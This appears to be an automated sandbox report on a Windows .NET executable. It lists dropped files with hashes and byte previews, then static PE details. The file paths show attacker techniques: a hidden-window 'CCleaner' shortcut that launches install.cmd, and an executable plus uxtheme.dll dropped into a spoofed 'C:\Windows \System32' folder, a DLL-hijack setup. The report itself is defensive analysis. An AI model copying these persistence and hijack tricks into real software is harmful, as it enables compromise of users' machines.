SSDEEP:	24:B08PKUcagX20VoXE+FZx/9wb8CokRMdpcUuDdgyzat15b9DZd7:B00KZagXRVyEC/9wbtor+DstLbXR
MD5:	A2EF8D31A8DC8EAFB642142CAE0BDDE5
SHA1:	6D33FA6AE5C8F3D94A889AF2AFBE701A8939BD4A
SHA-256:	A63D52B4D40DE4D08B155AB05F7B239F6B826D2E9AEF65D14C536CC17B117180
SHA-512:	0183DCD7C9808191B0D67319318EDB8069F15943CD9AFFDD5D905CA66471A301A3745EC2BDA93FD30400A08856F9530F8DB8A91555E910534E43591DE6588680
Malicious:	false
Preview:	ZBEDCJPBEYDZQGCVTGMBDASCMXWLERZBJTKXMSCERSGFDONQAMYGDFYKFYLRRNDSSGOWCSVJIWIVRJNDSQXJTTMAXVCSRDVBHJTJAHTUGCUAWHWEVTZMXBFFYFUVEYDCLBXZZXFGQTWOJCECEYXZGEOOJDMVGMJIBYUFGTAXZQFDALIISPEXNBMVCNQHJOUZVXMSFGVMMJSOTYBAIBARXRQIHGTHEJLHLQYVFLCLOFZPJJNGWGUFEFWDITXPCXBOEGYNGVEMPRSJBIUABRWYDIZIOEKFMGKERRXNEAUHHIGKJGZYYHOPIKNRRYEAZLMNYDGFIVIJPYMXKETIZCKXHUZFXIJHQQDRCSLMJZZJXMQYZJYWLCENOBYZRKIPDNTOCZBITNJXYFHPKLDLFNFTFPITPPGJYNAUOBLGWYVHPFDVDMRFKRTPDBLSNIHQBPMARNFKQAQJVIEOLDVNQKQXMHUIECHHCBWWKMSQPKKMTKTWVWEBVUAXWNLNMYEUBMGCGJTOJRQFGGHHLUDCSUNVREFGQLVZNTOMRGHSGVZCIEDGKHHTKATGJQYWMOXACOPMCHXJXNTBTSGCPUUSQVNCDVHCIQKUJWVUTGDNGWDNLQEWLMNYLKNVSFDBBIZZEHCDIMOJGCOBQZDWJNJPIEFNVWHFQSCSHGUQLBIQCMTBTOMPFZRCNWPIJILMFSCYXDRTMSMAVJZZGQJTZZACHQUIBTKCMOKJBPDOKJYCHADHETFJAVZAQIIWZRRGFSBGIIPYXFQSZKQPWXQCYERZGATQXEDAHDYBYZVROOBTIZFDOMRDVIUBHXTQOKCVSRLAYYMSBYFDGLRDCLXUKSNRGYDRFKSMAJGRBMDZLACAAKDZLPQZCVGELWTWVKPXDEMWCSQNQCJWQNLMOGJVDBANJWFKRRBFXUWVSMZLFJYCUJJORXEFPORKQLYKBMUOVWZKWNAHBCKBBJIYVVDQNIPFQZUTPFKYIRDTGOBWONUYXDVC

C:\Users\user\AppData\Local\Temp\tmp7268.tmp Download File
Process:	C:\Users\user\Desktop\1wOdXavtlE.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690895772725941
Encrypted:	false
SSDEEP:	24:ZTWQe0oC6OG/K8Vsypd0HuXw0xVfU/Vzv98UU:ZTWQr2VyXysHIwcGKUU
MD5:	A002E80B55673139253599B753BDC01A
SHA1:	6AEEF831A5AAB9155AAABB52D173859E20A86932
SHA-256:	F3484FA4E615D7134AC1BF4C3355C6AD63B32AC3CD096345C5EBF6B0CE6669A0
SHA-512:	D4A9257255BA4610E904C005F6734E65D5B0B4489E645792F3AB52AFD59B4B76E4B0FCE1F3457D7E5D3DA3101DAAC80A926FA513B77DAB01F2DAC5F5C4304CA7
Malicious:	false
Preview:	JSDNGYCOWYHKSOWFGCIERRTFYJMLBLSAMTEZRBUWFRXYICIUHZNIMVLJXTFXQNXACRFWSEWJBERQHLEBPYXRECCWDJKIIOUGNYQMGAHSLOPLLALAEDDKJTOOCDGYIBOWZZREIEWSXQRGULZIXFYNIUMNTNALWVABHVLKEJLBKGOKXZWDSWRTTLTQLNTZDYMSECYMQISNCNIAJOWDCCMHWLIVFACQKZXXZJOSENBJHZELIVOCAHDNZGZILFSILTSAJXDBFAIPHVHXYHJHVMVHKVOMYOGGVIKVJUVYLDFTICBCZKSVRDRTALSXFNMCPLGOGSEBKXSHSHVDVDKWEHNIBLPTMWICAACVFWPQNIUVLFSAWPOGDJFOGTXDHMTFWREVZXCABJCKFYXJGAHKTXNFLIILTMBRTKACTMOVDBLCVYDVLNCDXAAINTGCCRZPDTOFCWZWTHLCVGRTQPEBHUFYWLTLNUIOFLOUTCINZEJUVLTZPPDBVDEELCGFQSGJPRJBEALQLZQAYAQRUTUANCYUZJENWEIISDNULLJXJUPBQHEJEUVMKMEUQRDHXPAZVIFDUGNWXKXYWIQQNJNRMYCLJLHWESVCNCQSXILKRQFSYEDZSBHSLAYIWWOVRVVSWUFEAQPMAPAKFCXFBDIPKHPSFGVOJCEEBALPVQKECBBUCTQGQXOQAPOOYAPYQXNDLKJDRFQDILPIWRGDYTFUHSZLJICMMUSSHGHNLKNEDYXJSPECVTAEQTVXATOODAVROWNAPCHDRRBHVDVWBGOSCJGDENAGFCYDIHAPBWLJNOPCQCPTSOHGQQMHEAKRBOBSEHAOMGXJVYWJGLSIQJUOMYPNZTOFVNNMRIVMHOCFZTLTEDAGEXGJXLNRLSHJQGFHIJDLJHOPPMFPYEIXPRQCTRDIYDJEHHSKFBRZMXLZJBDDOYCXQJBCBQFRXVCYCHXKGNDWEEUUKPAGVHHOXFZXZEWWCOVSFYZHILZJQQKFHCLR

C:\Users\user\AppData\Local\Temp\tmp7269.tmp Download File
Process:	C:\Users\user\Desktop\1wOdXavtlE.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694982189683734
Encrypted:	false
SSDEEP:	24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
MD5:	E49F84B05A175C231342E6B705A24A44
SHA1:	41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
SHA-256:	EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
SHA-512:	84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
Malicious:	false
Preview:	KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST

C:\Users\user\AppData\Local\Temp\tmp726A.tmp Download File
Process:	C:\Users\user\Desktop\1wOdXavtlE.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6994061563025005
Encrypted:	false
SSDEEP:	24:B08PKUcagX20VoXE+FZx/9wb8CokRMdpcUuDdgyzat15b9DZd7:B00KZagXRVyEC/9wbtor+DstLbXR
MD5:	A2EF8D31A8DC8EAFB642142CAE0BDDE5
SHA1:	6D33FA6AE5C8F3D94A889AF2AFBE701A8939BD4A
SHA-256:	A63D52B4D40DE4D08B155AB05F7B239F6B826D2E9AEF65D14C536CC17B117180
SHA-512:	0183DCD7C9808191B0D67319318EDB8069F15943CD9AFFDD5D905CA66471A301A3745EC2BDA93FD30400A08856F9530F8DB8A91555E910534E43591DE6588680
Malicious:	false
Preview:	ZBEDCJPBEYDZQGCVTGMBDASCMXWLERZBJTKXMSCERSGFDONQAMYGDFYKFYLRRNDSSGOWCSVJIWIVRJNDSQXJTTMAXVCSRDVBHJTJAHTUGCUAWHWEVTZMXBFFYFUVEYDCLBXZZXFGQTWOJCECEYXZGEOOJDMVGMJIBYUFGTAXZQFDALIISPEXNBMVCNQHJOUZVXMSFGVMMJSOTYBAIBARXRQIHGTHEJLHLQYVFLCLOFZPJJNGWGUFEFWDITXPCXBOEGYNGVEMPRSJBIUABRWYDIZIOEKFMGKERRXNEAUHHIGKJGZYYHOPIKNRRYEAZLMNYDGFIVIJPYMXKETIZCKXHUZFXIJHQQDRCSLMJZZJXMQYZJYWLCENOBYZRKIPDNTOCZBITNJXYFHPKLDLFNFTFPITPPGJYNAUOBLGWYVHPFDVDMRFKRTPDBLSNIHQBPMARNFKQAQJVIEOLDVNQKQXMHUIECHHCBWWKMSQPKKMTKTWVWEBVUAXWNLNMYEUBMGCGJTOJRQFGGHHLUDCSUNVREFGQLVZNTOMRGHSGVZCIEDGKHHTKATGJQYWMOXACOPMCHXJXNTBTSGCPUUSQVNCDVHCIQKUJWVUTGDNGWDNLQEWLMNYLKNVSFDBBIZZEHCDIMOJGCOBQZDWJNJPIEFNVWHFQSCSHGUQLBIQCMTBTOMPFZRCNWPIJILMFSCYXDRTMSMAVJZZGQJTZZACHQUIBTKCMOKJBPDOKJYCHADHETFJAVZAQIIWZRRGFSBGIIPYXFQSZKQPWXQCYERZGATQXEDAHDYBYZVROOBTIZFDOMRDVIUBHXTQOKCVSRLAYYMSBYFDGLRDCLXUKSNRGYDRFKSMAJGRBMDZLACAAKDZLPQZCVGELWTWVKPXDEMWCSQNQCJWQNLMOGJVDBANJWFKRRBFXUWVSMZLFJYCUJJORXEFPORKQLYKBMUOVWZKWNAHBCKBBJIYVVDQNIPFQZUTPFKYIRDTGOBWONUYXDVC

C:\Users\user\AppData\Local\Temp\tmp8F36.tmp Download File
Process:	C:\Users\user\Desktop\1wOdXavtlE.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.792852251086831
Encrypted:	false
SSDEEP:	48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:	81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:	9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:	CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp8F37.tmp Download File
Process:	C:\Users\user\Desktop\1wOdXavtlE.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.792852251086831
Encrypted:	false
SSDEEP:	48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:	81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:	9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:	CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp8F67.tmp Download File
Process:	C:\Users\user\Desktop\1wOdXavtlE.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.792852251086831
Encrypted:	false
SSDEEP:	48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:	81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:	9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:	CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp8F68.tmp Download File
Process:	C:\Users\user\Desktop\1wOdXavtlE.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.792852251086831
Encrypted:	false
SSDEEP:	48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:	81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:	9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:	CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpB61B.tmp Download File
Process:	C:\Users\user\Desktop\1wOdXavtlE.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6951152985249047
Encrypted:	false
SSDEEP:	24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBopIvJn2QOYiUG3PaVrX:T5LLOpEO5J/Kn7U1uBopIvZXC/alX
MD5:	EA7F9615D77815B5FFF7C15179C6C560
SHA1:	3D1D0BAC6633344E2B6592464EBB957D0D8DD48F
SHA-256:	A5D1ABB57C516F4B3DF3D18950AD1319BA1A63F9A39785F8F0EACE0A482CAB17
SHA-512:	9C818471F69758BD4884FDB9B543211C9E1EE832AC29C2C5A0377C412454E8C745FB3F38FF6E3853AE365D04933C0EC55A46DDA60580D244B308F92C57258C98
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpB61C.tmp Download File
Process:	C:\Users\user\Desktop\1wOdXavtlE.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6951152985249047
Encrypted:	false
SSDEEP:	24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBopIvJn2QOYiUG3PaVrX:T5LLOpEO5J/Kn7U1uBopIvZXC/alX
MD5:	EA7F9615D77815B5FFF7C15179C6C560
SHA1:	3D1D0BAC6633344E2B6592464EBB957D0D8DD48F
SHA-256:	A5D1ABB57C516F4B3DF3D18950AD1319BA1A63F9A39785F8F0EACE0A482CAB17
SHA-512:	9C818471F69758BD4884FDB9B543211C9E1EE832AC29C2C5A0377C412454E8C745FB3F38FF6E3853AE365D04933C0EC55A46DDA60580D244B308F92C57258C98
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF480E086DE63F524E.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	34249
Entropy (8bit):	0.37355566827229153
Encrypted:	false
SSDEEP:	24:c9lLh9lLh9lIn9lIn9lRg9lRA9lzeF9lzeF9lyyea9lyyea9lQet29lQeLc9l2ek:kBqoxKge9eEyeXyeNetZe9ePemeCoeC
MD5:	94CE90CE52C708EA8BDF131F1083E2EB
SHA1:	BAA21021217F656E403F8DE11471505928071324
SHA-256:	4679AFB032B0273036A49575973E0050315FD3F907FAE091609C8BCB9D187FC0
SHA-512:	BAE75F51D368DC62444A54B3A4539B64E8FA7E825FFB0C2B1DD8164C54DA347B6F2A2F808FA80B963B4E8C2DE1A5EF70CED0719E3E306B8C6E4AD1C4E625C278
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF7F0501A3EC2F9AAE.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	34249
Entropy (8bit):	0.48569244671358636
Encrypted:	false
SSDEEP:	48:kBqoxKge+Ze+Aye+jye+Ze+Se+Ue++e+3e+7oe+7Dy:kBqoxKgh4y7yBacGv8
MD5:	F3220772A84CE1D73341B4389212D98F
SHA1:	2DB31F59C4581B2D38CFD400429A9B682A236115
SHA-256:	909109DE096E7B5B3016AE26DB74515F4FED8A1921BAA241AA714BBBA080E32B
SHA-512:	21854D1603A126272FC012A042730F747D629C94E9794831E613EAA43E7F7BE43A94278940D7B3EF9156DB6B5DD14DF944E4DA9CF65EF31BD5EBDF75E5E10B6B
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFB2E0A910E5D6D754.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	13221
Entropy (8bit):	0.5977853656421235
Encrypted:	false
SSDEEP:	24:c9lLh9lLh9lIn9lIn9loD9loD9lW1q+nf+C4TPqDK/5wfQqTa25:kBqoIkaXGFRmj9
MD5:	78C38D7A8818AEDB90F8EB2EC4AF7FD7
SHA1:	D452DFAFCF874C0831013DD402F6B0F52855AB7B
SHA-256:	025050B49CBB2368374E4E315676A7ADD6EDC46CAC378A3CFDC0111BCD4938FE
SHA-512:	7EA33F33EF3743194FB2C3C80154C629F415A41F00F84943BE1316BFF07C8631A459EBD117ED30FBC928201C9C5CC9DF4E6A28BBB4BDD36C3A86D57ABD96947D
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\CCleaner\CCleaner.lnk Download File
Process:	C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp
File Type:	MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
Category:	dropped
Size (bytes):	457
Entropy (8bit):	2.691936893227326
Encrypted:	false
SSDEEP:	6:4xtCl0V8ml//AvdhEttyWi7BZRYrNSbhEZMqYrNEMbhEt/n:8wl0V8i/kd0aGNSbtNEMb2n
MD5:	5F6F67CEA31AA670A64C5F89FDABC1FB
SHA1:	A51546AF6778A3C6EF970A55ADB53BABABEF191D
SHA-256:	6E2080A3863C760652C65B7537365A4B555BD2D41F22C6177082D9A9AE5C610C
SHA-512:	3149120491C4D3CEA36FB607B4E964917052C94BEB118DBFFBF762D398808C5B7D8DBE354320395E3E70045D4018BBBAE2C55BD9AE134D0A5E6B716AD17A9D11
Malicious:	false
Preview:	L..................F.............................................................P.O. .:i.....+00.../C:\...................b.1...........ProgramData.H............................................P.r.o.g.r.a.m.D.a.t.a.....b.2...........install.cmd.H............................................i.n.s.t.a.l.l...c.m.d.......2.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m.D.a.t.a.\.i.n.s.t.a.l.l...c.m.d...C.:.\.P.r.o.g.r.a.m.D.a.t.a.....

C:\Windows \System32\PasswordOnWakeSettingFlyout.exe Download File
Process:	C:\Windows\System32\cmd.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	43472
Entropy (8bit):	6.224421457593777
Encrypted:	false
SSDEEP:	768:+pH9d9NT4uJO0qK/lEbrDGe2gfBTDxxsg652PIBmRncHiDgcZd3cxe1PIc:EzNT4GpHaTDvst2gmRnVdZVcgPIc
MD5:	F0C8675F98E397383A112CC8ED5B97DA
SHA1:	644A87D9CEE0BC576402573224F6695AA45196D3
SHA-256:	0E9C85E4833BB1BF45CB66AA3B021A2CDA6074333C2217F8FFB5360B63719374
SHA-512:	ABF6B2BB5BB48C1C2E54C01656D3C448E8CD4159686F285D67CFF805A757FFAF6B0D7D9DD579786B739AD90ECB1FB6D43A181CBEBBC27FEA3504D48B61C10A5C
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........h.....J...J...J.q_J...J.m.K...J.m.K...J.m.K...J.m.K...J...J...J.m.K...J.m3J...J.m.K...JRich...J................PE..d....Z..........."......B...F.......I.........@....................................*}............... ......................................@...................,........#...........\|..T...........................0q..............0r...............................text....A.......B.................. ..`.imrsiv......`...........................rdata..8$...p...&...F..............@..@.data................l..............@....pdata..,............n..............@..@.rsrc................t..............@..@.reloc..............................@..B........................................................................................................................................................................................................................

C:\Windows \System32\uxtheme.dll Download File
Process:	C:\Windows\System32\cmd.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	56260
Entropy (8bit):	5.301245226064988
Encrypted:	false
SSDEEP:	768:egAs/cZz3DfEqTIYv4gKNwFPxPePdOKhQ2:JSzrEqTIm4gKN2PxPoIX2
MD5:	531FCC0848CF13FA300600DF16A71A87
SHA1:	20BFF8B5030D74AFBA1B4C20B5C8CC6F75011B62
SHA-256:	5B192BBC069B8AEF74DABB1DD5459BDA8EA2A64A7336DB54E57AFB38569ECE68
SHA-512:	AF8B8BBC666CE3C57E248ACF056A3C65B2E4EEA244C3C8DBB2D3765964407AF93478A3D452A08862501F61994C964DD6048720742413506952395143841673E3
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...&..].h........& .........6......0..........d.............................@................ .........................................R....................P..(...l...X ......d...........................`@..(...................\|...@............................text...............................`.P`.data........0......."..............@.P..rdata.......@.......$..............@.`@.pdata..(....P.......(..............@.0@.xdata.......`.......,..............@.0@.bss.... ....p........................`..edata..R...........................@.0@.idata...............0..............@.0..CRT....X............6..............@.@..tls.................8..............@.@..reloc..d............:..............@.0B/4......P............<..............@.PB/19.............. ...>..............@..B/31.....I............^..............@..B/45....."............`..............@..B/57.....

\Device\ConDrv Download File
Process:	C:\ProgramData\Immunity\CertMgry\CertMgr.Exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	19
Entropy (8bit):	3.5110854081804286
Encrypted:	false
SSDEEP:	3:RoHQGQB5:RZGU5
MD5:	E3AC0178A28CF8E44D82A62FAE2290D7
SHA1:	C0F1C66E831ADD5EA81B19BFA0E85D1D2CA192BA
SHA-256:	2C61108AC0158F555B0632F5658D79D502B0929F2090848A7DEB77158667D43C
SHA-512:	F7C2290526630DEF784459621007F389D720034D3BCE1EFF9B761C7A959061FDB465B9D239290EB543E7B0CFB41682361D0400459621F8756A8A09782F33693A
Malicious:	false
Preview:	CertMgr Succeeded..

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.511702357513023
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.79% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Win16/32 Executable Delphi generic (2074/23) 0.01%
File name:	1wOdXavtlE.exe
File size:	1285632
MD5:	a7e67e6abd539aeddbb9021d23f6f217
SHA1:	cea85a6d9e417f2b8c2b3962a1359defc096e502
SHA256:	f1849f447bfa07c3a9a9db11501a026d133541d0264424198f297f5ec70e1ff3
SHA512:	dcc458368f583d1d0288f9c021f0e9ffdc30d4ecb0567da786a9044a0427fdb697f74f0d672fe303d39e1900539f7e4d9fc82529a77e21e7340d302a4d4f7ce9
SSDEEP:	24576:qzLg9Sm17Jg/z11YTen4OQbV27XlXzirfV9XNAgdeKjw:7rJeYTzvVEzudYgdeKs
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....h`.................d...6........... ........@.. ....................... ............@................................

File Icon


Icon Hash:	70e8ce9e86b4b0d1

Static PE Info

General
Entrypoint:	0x4a820e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x60688ACF [Sat Apr 3 15:33:35 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xa81c0	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xac000	0x930e4	.rsrc
